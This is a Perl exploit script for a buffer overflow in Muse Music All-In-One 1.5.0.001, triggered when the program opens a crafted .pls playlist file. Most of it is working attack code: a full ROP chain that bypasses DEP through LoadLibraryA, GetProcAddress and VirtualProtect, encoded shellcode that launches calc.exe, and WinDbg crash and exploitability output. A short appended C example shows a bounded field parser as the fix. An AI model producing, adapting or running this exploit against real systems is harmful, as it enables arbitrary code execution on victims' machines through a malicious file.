#!/usr/bin/perl
#
#[+]Exploit Title: Muse Music All-In-One PLS File Buffer Overflow Exploit (DEP Bypass)
#[+]Date: 25\09\2011(DD\MM\YYYY)
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/Muse-Music-All-In-One/3000-2141_4-10070288.html
#[+]Version: 1.5.0.001
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#[+]Info:
#This exploit can be universal if the buffer that overwrites EIP is the same on all Windows systems. ;)
#To reproduce, click File -> Open... -> select Exploit.pls and watch Calc appear.
#

use strict;
use warnings;

print q{
	Created By C4SS!0 G0M3S
	E-mail netfuzzer@hotmail.com
	Blog net-fuzzer.blogspot.com
};

print "\n\t\t[+]Creating Exploit File...\n";
sleep(2);

##########################ROP START HERE###############################################
my $rop = pack('V',0x0043bc93); # POP EAX # RETN
$rop .= "AAAA" x 4;             # JUNK
$rop .= pack('V',0x00339014);   # PTR to a Call DWORD for LoadLibraryA
$rop .= pack('V',0x1002042f);   # POP EBP # RETN
$rop .= pack('V',0x0044387e);   # ADD ESP,40 # RETN == Return of LoadLibraryA
$rop .= pack('V',0x100255d1);   # POP ESI # RETN
$rop .= pack('V',0x003367C1);   # JMP [EAX] // Jump to [DWORD EAX] == LoadLibraryA
$rop .= pack('V',0x004a296b);   # POP EDI # RETN
$rop .= pack('V',0x004a296c);   # RETN
$rop .= pack('V',0x004b0519);   # PUSHAD # RETN
$rop .= "kernel32.dll\x00";
$rop .= "A" x 35;               # JUNK
#############################Call GetProcAddress###################################
$rop .= pack('V',0x004b2507);   # XCHG EAX,EBX # RETN
$rop .= pack('V',0x004a296b);   # POP EDI # RETN
$rop .= pack('V',0x003367C1);   # JMP [EAX] // Jump to [DWORD EAX] == GetProcAddress
$rop .= pack('V',0x100255d1);   # POP ESI # RETN
$rop .= pack('V',0x0044387e);   # ADD ESP,40 # RETN == Return of GetProcAddress
$rop .= pack('V',0x004b2507);   # XCHG EAX,EBX # RETN
$rop .= pack('V',0x004b9563);   # XCHG EAX,EBP # RETN
$rop .= pack('V',0x0043bc93);   # POP EAX # RETN
$rop .= pack('V',0x00339010);   # PTR to GetProcAddress
$rop .= pack('V',0x004a296b);   # POP EDI # RETN
$rop .= pack('V',0x003367C1);   # JMP [EAX] // Jump to [DWORD EAX] == GetProcAddress
$rop .= pack('V',0x004b0519);   # PUSHAD # RETN
$rop .= "VirtualProtect\x00";
$rop .= "A" x 33;               # JUNK
#############################Call VirtualProtect####################################
$rop .= pack('V',0x004b2507);   # XCHG EAX,EBX # RETN
$rop .= pack('V',0x00432a42);   # PUSH ESP # POP EDI # XOR EAX,EAX # POP ESI # RETN 08
$rop .= "VVVV";                 # JUNK
$rop .= pack('V',0x004a296c) x 3; # RETN
$rop .= pack('V',0x10018000);   # XOR EAX,EAX # RETN
$rop .= pack('V',0x0043bc93);   # POP EAX # RETN
$rop .= pack('V',0x00000040);   # Value of flNewProtect
$rop .= pack('V',0x00478695);   # XCHG EAX,EDX # RETN
$rop .= pack('V',0x10018000);   # XOR EAX,EAX # RETN
$rop .= pack('V',0x1001433f);   # ADD EAX,EDI # POP EDI # POP ESI # RETN
$rop .= "A" x 8;                # JUNK
$rop .= pack('V',0x1002028b);   # POP ECX # RETN
$rop .= "\x00\x00\x00\x00";
$rop .= pack('V',0x1000B6ED);   # ADD ECX,EAX # MOV DWORD PTR DS:[10085B38],ECX # RETN
$rop .= pack('V',0x004b2507);   # XCHG EAX,EBX # RETN
$rop .= pack('V',0x1002042f);   # POP EBP # RETN
$rop .= pack('V',0x10012107);   # PUSH ESP # RETN == Return of VirtualProtect
$rop .= pack('V',0x004a05b8);   # POP EBX # RETN
$rop .= pack('V',0x00000500);   # Value of dwSize
$rop .= pack('V',0x004b2c56);   # XCHG EAX,ESI # RETN
$rop .= pack('V',0x004a296b);   # POP EDI # RETN
$rop .= pack('V',0x004a296c);   # RETN
$rop .= pack('V',0x004b0519);   # PUSHAD # RETN
##########################ROP END HERE#################################################

my $shellcode = "\xb8\x4b\xaf\x2d\x0e\xda\xde\xd9\x74\x24\xf4\x5b\x29\xc9" .
"\xb1\x32\x83\xeb\xfc\x31\x43\x0e\x03\x08\xa1\xcf\xfb\x72" .
"\x55\x86\x04\x8a\xa6\xf9\x8d\x6f\x97\x2b\xe9\xe4\x8a\xfb" .
"\x79\xa8\x26\x77\x2f\x58\xbc\xf5\xf8\x6f\x75\xb3\xde\x5e" .
"\x86\x75\xdf\x0c\x44\x17\xa3\x4e\x99\xf7\x9a\x81\xec\xf6" .
"\xdb\xff\x1f\xaa\xb4\x74\x8d\x5b\xb0\xc8\x0e\x5d\x16\x47" .
"\x2e\x25\x13\x97\xdb\x9f\x1a\xc7\x74\xab\x55\xff\xff\xf3" .
"\x45\xfe\x2c\xe0\xba\x49\x58\xd3\x49\x48\x88\x2d\xb1\x7b" . # Shellcode Winexec "Calc.exe"
"\xf4\xe2\x8c\xb4\xf9\xfb\xc9\x72\xe2\x89\x21\x81\x9f\x89" . # Bad chars "\x00\x20\x3d\x0a\x0d\xff"
"\xf1\xf8\x7b\x1f\xe4\x5a\x0f\x87\xcc\x5b\xdc\x5e\x86\x57" .
"\xa9\x15\xc0\x7b\x2c\xf9\x7a\x87\xa5\xfc\xac\x0e\xfd\xda" .
"\x68\x4b\xa5\x43\x28\x31\x08\x7b\x2a\x9d\xf5\xd9\x20\x0f" .
"\xe1\x58\x6b\x45\xf4\xe9\x11\x20\xf6\xf1\x19\x02\x9f\xc0" .
"\x92\xcd\xd8\xdc\x70\xaa\x17\x97\xd9\x9a\xbf\x7e\x88\x9f" .
"\xdd\x80\x66\xe3\xdb\x02\x83\x9b\x1f\x1a\xe6\x9e\x64\x9c" .
"\x1a\xd2\xf5\x49\x1d\x41\xf5\x5b\x7e\x04\x65\x07\x81";

my $buf = "A" x 1300;
$buf .= $rop;
$buf .= "\x90" x 10;
$buf .= $shellcode;
$buf .= "A" x 2000;

open(my $file,">Exploit.pls") or die "[-]Error: $!\n";
print $file $buf;
close $file;
print "\t\t[+]File Exploit.pls Created Successfully.\n";
sleep(1);

=head

(8f4.8f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000041 ebx=0000007b ecx=ffffffff edx=00000002 esi=00130000 edi=77c3fce0
eip=77c24609 esp=0012ea1c ebp=0012ec34 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll - 
msvcrt!wscanf+0x2343:
77c24609 8806            mov     byte ptr [esi],al          ds:0023:00130000=41
0:000> .exr -1
ExceptionAddress: 77c24609 (msvcrt!wscanf+0x00002343)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 00130000
Attempt to write to address 00130000
0:000> .lastevent
Last event: 8f4.8f8: Access violation - code c0000005 (first chance)
  debugger time: Sun Sep 25 19:22:13.937 2011 (UTC - 3:00)
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0012ec34 77c212df msvcrt!wscanf+0x2343
*** WARNING: Unable to verify checksum for Muse.exe
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for Muse.exe - 
0012ec70 00498d3a msvcrt!fscanf+0x28
0012eca4 7c91a3cb Muse!CSdll::operator=+0x974fa
0012ecb8 7c91a351 ntdll!RtlpUnWaitCriticalSection+0x86c
00000000 00000000 ntdll!RtlpUnWaitCriticalSection+0x7f2
0:000> g
(8f4.8f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=0012e64c ebp=0012e66c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
41414141 ??              ???
0:000> !load winext/msec.dll
0:000> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x41414141
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation

Exception Hash (Major/Minor): 0x71174239.0x2a6b1069

Stack Trace:
Unknown
ntdll!RtlConvertUlongToLargeInteger+0x6a
ntdll!RtlConvertUlongToLargeInteger+0x3c
ntdll!KiUserExceptionDispatcher+0xe
msvcrt!fscanf+0x28
Muse!CSdll::operator=+0x974fa
ntdll!RtlpUnWaitCriticalSection+0x86c
ntdll!RtlpUnWaitCriticalSection+0x7f2
Instruction Address: 0x0000000041414141

Description: Read Access Violation at the Instruction Pointer
Short Description: ReadAVonIP
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Read Access Violation at the Instruction Pointer starting at Unknown Symbol @ 0x0000000041414141 called from ntdll!RtlConvertUlongToLargeInteger+0x000000000000006a (Hash=0x71174239.0x2a6b1069)

Access violations at the instruction pointer are exploitable if not near NULL.

=cut
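As an added example (not Muse's code or the author's), the C below places an unbounded scanf-style field read next to a bounded one that rejects over-long fields; the unbounded form is an assumption about the root cause, consistent with the crash dump above (fscanf reaching a wscanf byte-store loop with AL=0x41) and with a bad-character list made of the bytes that end a %s token, but not confirmed by the page. FIELD_MAX, FIELD_FMT and the function names are chosen for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#define FIELD_MAX 256      /* buffer size chosen for this example */
#define FIELD_FMT "%255s"  /* width limit = FIELD_MAX - 1 */

/* Vulnerable pattern (assumption, see lead-in): no width limit, so a token
 * longer than the buffer is copied past its end onto the stack. Kept only
 * for contrast; it is never given oversized input here. */
int read_field_unbounded(FILE *f, char out[FIELD_MAX])
{
    return fscanf(f, "%s", out) == 1;
}

/* Hardened form: the width limit stops the copy at FIELD_MAX-1 bytes, and
 * the lookahead rejects a token that did not end there rather than passing
 * a silently truncated value on. 1 = read, 0 = no token, -1 = too long. */
int read_field_bounded(FILE *f, char out[FIELD_MAX])
{
    if (fscanf(f, FIELD_FMT, out) != 1)
        return 0;
    int c = fgetc(f);
    if (c == EOF)
        return 1;
    ungetc(c, f);
    return isspace(c) ? 1 : -1;
}

/* Run the bounded reader over an in-memory file image (via tmpfile). */
int check_pls_field(const char *data, size_t len, char out[FIELD_MAX])
{
    FILE *f = tmpfile();
    if (!f) return 0;
    fwrite(data, 1, len, f);
    rewind(f);
    int rc = read_field_bounded(f, out);
    fclose(f);
    return rc;
}

/* Constructed inputs: a well-formed playlist field, then a 1300-byte run
 * of 'A' with no whitespace, mirroring the exploit file's leading filler. */
int demo(void)
{
    char out[FIELD_MAX], filler[1300];
    memset(filler, 'A', sizeof filler);
    if (check_pls_field("File1=track.mp3\n", 16, out) != 1) return 0;
    if (strcmp(out, "File1=track.mp3") != 0) return 0;
    return check_pls_field(filler, sizeof filler, out) == -1;
}
```

The bounded reader returns -1 for the filler instead of writing past the buffer, which is the point at which the parser should abort loading the file.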